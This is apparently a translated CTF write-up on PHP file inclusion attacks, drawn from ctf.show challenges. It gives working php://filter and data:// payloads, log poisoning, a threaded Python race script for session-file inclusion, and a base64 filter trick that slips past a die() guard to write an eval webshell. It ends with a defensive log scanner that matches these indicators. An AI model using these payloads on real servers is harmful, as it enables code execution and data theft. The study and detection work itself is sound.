Using challenges from the ctf.show site as examples, this post summarises the file inclusion vulnerability as it appears in CTFs.
Reading source with the php://filter wrapper (the included file comes back base64-encoded instead of being executed):
?file=php://filter/convert.base64-encode/resource=flag.php
Executing code through the data:// wrapper (only possible when allow_url_include=On):
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
Log poisoning. Log file path: ?file=/var/log/nginx/access.log
apache2: /var/log/apache2/access.log
Including the log directly displays the User-Agent values; writing PHP into it yields a shell. Note: the included log only shows the first few requests; to see the current request you have to visit it once more. https://blog.csdn.net/weixin_45669205/article/details/113709363
Session file inclusion (PHP_SESSION_UPLOAD_PROGRESS). Principle:
Add a cookie PHPSESSID=flag and put the one-line webshell in the PHP_SESSION_UPLOAD_PROGRESS field.
PHP will then create a session file on the server: /tmp/sess_flag (here we assume the default session storage location is /tmp).
Pass ?file=/tmp/sess_flag on the challenge page and capture the request. Brute-force both sides at the same time to trigger the race, obtain the file name, then brute-force again to read the file. lonmar's universal script:

```python
# -*- coding: utf-8 -*-
# @author: lonmar
import io
import threading

import requests

sessID = 'flag'
url = 'http://167fff40-d240-4032-b724-1da8660ec305.chall.ctf.show:8080/'


def write(session):
    # Keep uploading so PHP keeps recreating /tmp/sess_<sessID> with the upload progress data
    while event.is_set():
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            url,
            cookies={'PHPSESSID': sessID},
            data={'PHP_SESSION_UPLOAD_PROGRESS': ' '},
            files={'file': ('test.txt', f)},
        )


def read(session):
    # Race the cleanup: include the session file before PHP removes it
    while event.is_set():
        response = session.get(url + '?file=/tmp/sess_{}'.format(sessID))
        if 'test' in response.text:
            print(response.text)
            event.clear()
        else:
            print('[*]retrying...')


if __name__ == '__main__':
    event = threading.Event()
    event.set()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
```
https://xz.aliyun.com/t/8163#toc-3
https://www.leavesongs.com/PENETRATION/php-filter-magic.html
The challenge writes the file with a "dead code" guard prepended to the content:

```php
file_put_contents(urldecode($file), "<?php die; ?>".$content);
```
Because a die() or exit() is present, even if we successfully write a one-line webshell it can never be executed.
Use base64 decoding: the dead code is decoded into garbage so the PHP engine cannot recognise it.
First prepare the target file 1.php with the pseudo-protocol:
php://filter/write=convert.base64-decode/resource=1.php
Because urldecode($file) is applied to the parameter,
the value must be double URL-encoded:
%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30
POST the webshell:
//PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ICA/Pg==
The convert.base64-decode filter discards characters outside the base64 alphabet, so of "<?php die; ?>" only "phpdie" (6 characters) survives. Because base64 decodes in groups of 4 characters, we append 2 "a" characters to make 8 in total. That way "phpdieaa" is decoded normally, and the base64 of the webshell we send after it is also decoded normally. The result is that <?php die; ?> is gone.
If the guard is exit instead ("phpexit", 7 characters), only 1 "a" needs to be added.
Then access 1.php.
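From the defender's side, every technique above leaves a distinctive value in the request path or User-Agent. The following is an added example, not code from the original post or from ctf.show: a small Python scanner that normalises percent-encoding (so the double-encoded form above still matches) and flags the wrapper, log-path, session-file and PHP-tag indicators in constructed access log lines. The indicator names and sample lines are my own.

```python
import re
from urllib.parse import quote, unquote

# Indicators drawn from the techniques above (indicator names are my own labels)
LFI_INDICATORS = {
    "php_filter_read": re.compile(r"php://filter/.*convert\.base64-encode"),
    "php_filter_write": re.compile(r"php://filter/write=convert\.base64-decode"),
    "data_wrapper": re.compile(r"data:(//)?text/plain"),
    "log_poisoning": re.compile(r"/var/log/(nginx|apache2)/access\.log"),
    "session_file": re.compile(r"/tmp/sess_[a-z0-9,-]+"),
    "php_open_tag": re.compile(r"<\?php"),
}
# Combined log format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')


def normalize(value, max_rounds=3):
    # Percent-decode repeatedly so the double-encoded form used above matches too
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()


def scan_log(lines):
    # Return (ip, indicator, field) for every request path or User-Agent that matches
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("path", "ua"):
            text = normalize(m.group(field))
            for name, pattern in LFI_INDICATORS.items():
                if pattern.search(text):
                    hits.append((m.group("ip"), name, field))
    return hits


# Constructed sample log lines (not real traffic); the 10.0.0.6 request is double URL-encoded
T = "[01/Jan/2024:10:00:00 +0000]"
DOUBLE_ENCODED = quote(quote("php://filter/write=convert.base64-decode/resource=1.php", safe=""), safe="")
SAMPLE_LOG = [
    f'10.0.0.5 - - {T} "GET /index.php?file=php://filter/convert.base64-encode/resource=flag.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'10.0.0.6 - - {T} "GET /index.php?file={DOUBLE_ENCODED} HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    f'10.0.0.7 - - {T} "GET /index.php?file=/tmp/sess_flag HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
    f'10.0.0.8 - - {T} "GET /index.php?file=/var/log/nginx/access.log HTTP/1.1" 200 4096 "-" "<?php echo 1; ?>"',
    f'192.0.2.1 - - {T} "GET /index.php?file=about.html HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]
```

Running `scan_log(SAMPLE_LOG)` reports one hit per matching field, and the benign 192.0.2.1 request produces none; the real fix remains never passing user input to include() without a whitelist.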